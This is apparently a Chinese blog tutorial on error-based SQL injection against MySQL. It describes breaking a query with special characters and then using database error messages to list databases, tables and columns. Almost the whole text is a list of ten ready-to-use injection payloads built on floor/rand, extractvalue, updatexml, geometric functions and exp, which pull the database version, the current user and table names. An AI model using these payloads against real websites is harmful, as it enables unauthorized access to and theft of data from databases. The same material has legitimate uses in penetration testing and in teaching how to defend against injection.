报错注入

通过输入特殊符号,让浏览器报错,然后通过报错语句执行我们的sql语句,记得在最后加上注释如 --+,# 或者 or '1

一、通过输入特殊符号,让浏览器报错。

二、执行报错语句,查库、查表、查字段。

通过修改报错语句里面的sql语句达到我们查库、查表、查字段的目的。

三、十大报错语句。

1、通过floor报错
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2、ExtractValue
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

3、UpdateXml
测试语句
and updatexml(1,concat(0x5e24,(select user()),0x5e24),1)

4.geometrycollection()
and geometrycollection((select * from(select * from(select user())a)b))

5.multipoint()
and multipoint((select * from(select * from(select user())a)b));

6.polygon()
and polygon((select * from(select * from(select user())a)b));

7.multipolygon()
and multipolygon((select * from(select * from(select user())a)b));

8.linestring()
and linestring((select * from(select * from(select user())a)b));

9.multilinestring()
and multilinestring((select * from(select * from(select user())a)b)); //多显示

10.exp()
and exp(~(select * from(select user())a));

发表评论

电子邮件地址不会被公开。 必填项已用*标注